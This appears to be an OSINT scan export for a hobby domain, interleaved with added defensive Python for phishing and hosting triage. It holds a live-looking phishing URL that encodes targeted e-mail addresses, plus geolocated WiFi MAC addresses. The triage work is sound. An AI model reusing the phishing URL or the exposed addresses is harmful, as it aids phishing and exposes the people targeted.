| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Cocos Islands | rathook.cc |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | HPN (Net ID: 00:0C:41:76:71:40) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-fastly-request-id: 81f392d6f8601ba9f7017cc835b0845172eec1e9 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /*
MIT License
Copyright (c) 2017 Pavel Dobryakov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
'use strict';
// Mobile promo section
const promoPopup = document.getElementsByClassName('promo')[0];
const promoPopupClose = document.getElementsByClassName('promo-close')[0];
if (isMobile()) {
setTimeout(() => {
promoPopup.style.display = 'table';
}, 20000);
}
promoPopupClose.addEventListener('click', e => {
promoPopup.style.display = 'none';
});
const appleLink = document.getElementById('apple_link');
appleLink.addEventListener('click', e => {
ga('send', 'event', 'link promo', 'app');
window.open('https://apps.apple.com/us/app/fluid-simulation/id1443124993');
});
const googleLink = document.getElementById('google_link');
googleLink.addEventListener('click', e => {
ga('send', 'event', 'link promo', 'app');
window.open('https://play.google.com/store/apps/details?id=games.paveldogreat.fluidsimfree');
});
// Simulation section
const canvas = document.getElementsByTagName('canvas')[0];
resizeCanvas();
let config = {
SIM_RESOLUTION: 128,
DYE_RESOLUTION: 1024,
CAPTURE_RESOLUTION: 512,
DENSITY_DISSIPATION: 1,
VELOCITY_DISSIPATION: 0.2,
PRESSURE: 0.8,
PRESSURE_ITERATIONS: 20,
CURL: 30,
SPLAT_RADIUS: 0.25,
SPLAT_FORCE: 6000,
SHADING: true,
COLORFUL: true,
COLOR_UPDATE_SPEED: 10,
PAUSED: false,
BACK_COLOR: { r: 0, g: 0, b: 0 },
TRANSPARENT: false,
BLOOM: true,
BLOOM_ITERATIONS: 8,
BLOOM_RESOLUTION: 256,
BLOOM_INTENSITY: 0.8,
BLOOM_THRESHOLD: 0.6,
BLOOM_SOFT_KNEE: 0.7,
SUNRAYS: true,
SUNRAYS_RESOLUTION: 196,
SUNRAYS_WEIGHT: 1.0,
}
function pointerPrototype () {
this.id = -1;
this.texcoordX = 0;
this.texcoordY = 0;
this.prevTexcoordX = 0;
this.prevTexcoordY = 0;
this.deltaX = 0;
this.deltaY = 0;
this.down = false;
this.moved = false;
this.color = [30, 0, 300];
}
let pointers = [];
let splatStack = [];
pointers.push(new pointerPrototype());
const { gl, ext } = getWebGLContext(canvas);
if (isMobile()) {
config.DYE_RESOLUTION = 512;
}
if (!ext.supportLinearFiltering) {
config.DYE_RESOLUTION = 512;
config.SHADING = false;
config.BLOOM = false;
config.SUNRAYS = false;
}
startGUI();
function getWebGLContext (canvas) {
const params = { alpha: true, depth: false, stencil: false, antialias: false, preserveDrawingBuffer: false };
let gl = canvas.getContext('webgl2', params);
const isWebGL2 = !!gl;
if (!isWebGL2)
gl = canvas.getContext('webgl', params) || canvas.getContext('experimental-webgl', params);
let halfFloat;
let supportLinearFiltering;
if (isWebGL2) {
gl.getExtension('EXT_color_buffer_float');
supportLinearFiltering = gl.getExtension('OES_texture_float_linear');
} else {
halfFloat = gl.getExtension('OES_texture_half_float');
supportLinearFiltering = gl.getExtension('OES_texture_half_float_linear');
}
gl.clearColor(0.0, 0.0, 0.0, 1.0);
const halfFloatTexType = isWebGL2 ? gl.HALF_FLOAT : halfFloat.HALF_FLOAT_OES;
let formatRGBA;
let formatRG;
let formatR;
if (isWebGL2)
{
formatRGBA = getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RG16F, gl.RG, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.R16F, gl.RED, halfFloatTexType);
}
else
{
formatRGBA = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
}
ga('send', 'event', isWebGL2 ? 'webgl2' : 'webgl', formatRGBA == null ? 'not supported' : 'supported');
return {
gl,
ext: {
formatRGBA,
formatRG,
formatR,
halfFloatTexType,
supportLinearFiltering
}
};
}
function getSupportedFormat (gl, internalFormat, format, type)
{
if (!supportRenderTextureFormat(gl, internalFormat, format, type))
{
switch (internalFormat)
{
case gl.R16F:
return getSupportedFormat(gl, gl.RG16F, gl.RG, type);
case gl.RG16F:
return getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, type);
default:
return null;
}
}
return {
internalFormat,
format
}
}
function supportRenderTextureFormat (gl, internalFormat, format, type) {
let texture = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, texture);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.CLAMP_TO_EDGE);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.CLAMP_TO_EDGE);
gl.texImage2D(gl.TEXTURE_2D, 0, internalFormat, 4, 4, 0, format, type, null);
let fbo = gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER, fbo);
gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, texture, 0);
let status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);
return status == gl.FRAMEBUFFER_COMPLETE;
}
function startGUI () {
var gui = new dat.GUI({ width: 300 });
gui.add(config, 'DYE_RESOLUTION', { 'high': 1024, 'medium': 512, 'low': 256, 'very low': 128 }).name('quality').onFinishChange(initFramebuffers);
gui.add(config, 'SIM_RESOLUTION', { '32': 32, '64': 64, '128': 128, '256': 256 }).name('sim resolution').onFinishChange(initFramebuffers);
gui.add(config, 'DENSITY_DISSIPATION', 0, 4.0).name('density diffusion');
gui.add(config, 'VELOCITY_DISSIPATION', 0, 4.0).name('velocity diffusion');
gui.add(config, 'PRESSURE', 0.0, 1.0).name('pressure');
gui.add(config, 'CURL', 0, 50).name('vorticity').step(1);
gui.add(config, 'SPLAT_RADIUS', 0.01, 1.0).name('splat radius');
gui.add(config, 'SHADING').name('shading').onFinishChange(updateKeywords);
gui.add(config, 'COLORFUL').name('colorful');
gui.add(config, 'PAUSED').name('paused').listen();
gui.add({ fun: () => {
splatStack.push(parseInt(Math.random() * 20) + 5);
} }, 'fun').name('Random splats');
let bloomFolder = gui.addFolder('Bloom');
bloomFolder.add(config, 'BLOOM').name('enabled').onFinishChange(updateKeywords);
bloomFolder.add(config, 'BLOOM_INTENSITY', 0.1, 2.0).name('intensity');
bloomFolder.add(config, 'BLOOM_THRESHOLD', 0.0, 1.0).name('threshold');
let sunraysFolder = gui.addFolder('Sunrays');
sunraysFolder.add(config, 'SUNRAYS').name('enabled').onFinishChange(updateKeywords);
sunraysFolder.add(config, 'SUNRAYS_WEIGHT', 0.3, 1.0).name('weight');
let captureFolder = gui.addFolder('Capture');
captureFolder.addColor(config, 'BACK_COLOR').name('background color');
captureFolder.add(config, 'TRANSPARENT').name('transparent');
captureFolder.add({ fun: captureScreenshot }, 'fun').name('take screenshot');
let github = gui.add({ fun : () => {
window.open('https://github.com/PavelDoGreat/WebGL-Fluid-Simulation');
ga('send', 'event', 'link button', 'github');
} }, 'fun').name('Github');
github.__li.className = 'cr function bigFont';
github.__li.style.borderLeft = '3px solid #8C8C8C';
let githubIcon = document.createElement('span');
github.domElement.parentElement.appendChild(githubIcon);
githubIcon.className = 'icon github';
let twitter = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'twitter');
window.open('https://twitter.com/PavelDoGreat');
} }, 'fun').name('Twitter');
twitter.__li.className = 'cr function bigFont';
twitter.__li.style.borderLeft = '3px solid #8C8C8C';
let twitterIcon = document.createElement('span');
twitter.domElement.parentElement.appendChild(twitterIcon);
twitterIcon.className = 'icon twitter';
let discord = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'discord');
window.open('https://discordapp.com/invite/CeqZDDE');
} }, 'fun').name('Discord');
discord.__li.className = 'cr function bigFont';
discord.__li.style.borderLeft = '3px solid #8C8C8C';
let discordIcon = document.createElement('span');
discord.domElement.parentElement.appendChild(discordIcon);
discordIcon.className = 'icon discord';
let app = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'app');
window.open('http://onelink.to/5b58bn');
} }, 'fun').name('Check out mobile app');
app.__li.className = 'cr function appBigFont';
app.__li.style.borderLeft = '3px solid #00FF7F';
let appIcon = document.createElement('span');
app.domElement.parentElement.appendChild(appIcon);
appIcon.className = 'icon app';
if (isMobile())
gui.close();
}
function isMobile () {
return /Mobi|Android/i.test(navigator.userAgent);
}
function captureScreenshot () {
let res = getResolution(config.CAPTURE_RESOLUTION);
let target = createFBO(res.width, res.height, ext.formatRGBA.internalFor | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThomasWirelessNetwork (Net ID: 00:0D:3A:2C:F8:2D) | 39.0469, -77.4903 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomD86B30 (Net ID: 00:0C:F6:D8:6B:30) | 50.8897, 6.0563 |
| 2023-05-12 02:56:07 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://cakrakembang-hotel.com/wp-admin/ms-footer/28390012/fguy3d273d723482345d/r1.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wm50098748930309454ft456.netlify.app/index.htm#icoh%40inail.it%26data%3D05%7C01%7Cioc%40inail.it%7C98d23947704a4d7f239f08dac8a747e7%7C418322d35401446f99969e2e03ee3a5e%7C0%7C0%7C638042919755577393%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiL', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cakrakembang-hotel.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.htm HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.htm HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; 
Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/style_v2_optimized.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/style_v2_optimized.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/open_sans.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/open_sans.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: 
Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/webmail-logo.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/webmail-logo.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET 
/cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-Bold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-Bold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBold-webfont.eot? 
HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-BoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-BoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBoldItalic-webfont.eot? 
HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192032/unprotected/cpanel/fonts/open_sans/OpenSans-Italic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicat | 104.196.30.220 |
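The Hybrid Analysis record above was submitted with the landing page's URL carrying a `#` fragment: an e-mail address followed by a URL-encoded `data=` blob that contains a second address, two GUID-like values, a timestamp-like integer and a base64 tail. Browsers never send the fragment to the server, so the sandbox's submitted URL is the only place the targeted mailbox survives. The following is an added example for triaging such records, not code from SpiderFoot, Hybrid Analysis or the phishing kit; the field layout of the `data=` blob is not documented on this page, so the code only reports which pipe-separated fields look like addresses and tries to decode the truncated base64 tail.

```python
"""Recover the pre-filled target address(es) from a credential-phishing URL
whose fragment carries the victim mailbox (added example, not page code)."""
import base64
import re
from urllib.parse import urlsplit, unquote

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# The submit_name URL from the Hybrid Analysis row above, copied verbatim.
SUBMITTED_URL = (
    "https://wm50098748930309454ft456.netlify.app/index.htm#icoh%40inail.it%26data%3D05%7C01"
    "%7Cioc%40inail.it%7C98d23947704a4d7f239f08dac8a747e7%7C418322d35401446f99969e2e03ee3a5e"
    "%7C0%7C0%7C638042919755577393%7CUnknown"
    "%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiL"
)


def _loose_b64(s):
    """Decode base64 that was cut off mid-way: drop the unusable tail instead of failing."""
    s = s[: len(s) - len(s) % 4]
    try:
        return base64.b64decode(s).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_targets(url):
    """Return the addresses found in the URL fragment plus the raw data= fields.

    The fragment is decoded once (the kit URL-encodes '&' and '=' so the whole
    payload survives as one fragment) and then split like a query string.
    """
    frag = unquote(urlsplit(url).fragment)
    result = {"emails": [], "data_fields": [], "data_tail_decoded": None}
    for part in frag.split("&"):
        key, _, value = part.partition("=")
        if not value:
            # bare token: the address the page pre-fills into its login form
            if EMAIL_RE.match(key):
                result["emails"].append(key)
            continue
        if key == "data":
            fields = value.split("|")
            result["data_fields"] = fields
            result["emails"] += [f for f in fields if EMAIL_RE.match(f)]
            result["data_tail_decoded"] = _loose_b64(fields[-1])
    # de-duplicate while keeping first-seen order
    result["emails"] = list(dict.fromkeys(result["emails"]))
    return result


if __name__ == "__main__":
    found = extract_targets(SUBMITTED_URL)
    for addr in found["emails"]:
        print("targeted mailbox:", addr)
    print("data= tail decodes to:", found["data_tail_decoded"])
```

Run against the URL from the record, the two addresses `icoh@inail.it` and `ioc@inail.it` come out, and the base64 tail decodes to a `Mailflow|{...}` prefix, which is what should go into the incident ticket alongside the sandbox verdict rather than the netlify hostname alone.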
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000cap.github.io | 185.199.111.153 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/_BattleB0t_?version=2 | _BattleB0t_ |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi2.battleb0t.xyz |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0.github.io]
https://www.openphish.com/feed.txt | 0.github.io |
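The Strange Header Identifier row above (`server: GitHub.com`, `via: 1.1 varnish`, `x-fastly-request-id`, `x-github-request-id`) identifies a GitHub Pages origin behind Fastly, and the Co-Hosted Site and OpenPhish rows sit on 185.199.111.153, one of the four published GitHub Pages A records that every `*.github.io` site shares. A phishing page on the same anycast address is shared-infrastructure noise, not a relationship with the scan target. The following is an added example for scoring such findings, not SpiderFoot's own correlation logic; the 185.199.108.0/22 range is a deliberately broad assumption, the published records being 185.199.108.153 through 185.199.111.153.

```python
"""Fingerprint the hosting stack from response headers and discount
'co-hosted' findings on shared anycast IPs (added example, not page code)."""
import ipaddress
import json

# Trimmed copy of the response headers recorded in the Strange Header row.
HEADERS_JSON = json.dumps({
    "via": "1.1 varnish",
    "x-served-by": "cache-lga21982-LGA",
    "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9",
    "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55",
    "server": "GitHub.com",
    "content-type": "text/css; charset=utf-8",
})

# Shared-hosting ranges where a "co-hosted site" carries no signal.
# Assumption: the whole /22 is treated as GitHub Pages; extend as needed.
SHARED_RANGES = {
    "GitHub Pages": [ipaddress.ip_network("185.199.108.0/22")],
}


def fingerprint_hosting(headers):
    """Return human-readable hints about origin and edge from header names/values."""
    h = {k.lower(): str(v) for k, v in headers.items()}
    hints = []
    if h.get("server", "").lower() == "github.com" or "x-github-request-id" in h:
        hints.append("GitHub Pages origin")
    if "x-fastly-request-id" in h or h.get("via", "").endswith("varnish"):
        hints.append("Fastly CDN edge")
    return hints


def hosting_from_row(raw_json):
    """Convenience wrapper for the JSON blob SpiderFoot stores in the Source Data column."""
    return fingerprint_hosting(json.loads(raw_json))


def weigh_cohosted(ip, cohosted_findings):
    """Return (shared_provider, findings_still_worth_correlating).

    On a shared anycast IP every tenant is a 'co-host', so the list collapses
    to nothing; on an ordinary IP the findings are passed through untouched.
    """
    addr = ipaddress.ip_address(ip)
    provider = next(
        (name for name, nets in SHARED_RANGES.items() if any(addr in n for n in nets)),
        None,
    )
    if provider is None:
        return None, list(cohosted_findings)
    return provider, []


if __name__ == "__main__":
    print(hosting_from_row(HEADERS_JSON))
    print(weigh_cohosted("185.199.111.153", ["0000cap.github.io", "0.github.io (OpenPhish)"]))
```

With the page's own data the header row yields both hints and the two co-hosted entries on 185.199.111.153 are dropped, while a finding on a non-shared address such as 165.232.113.85 passes through unchanged and still deserves a look.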
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
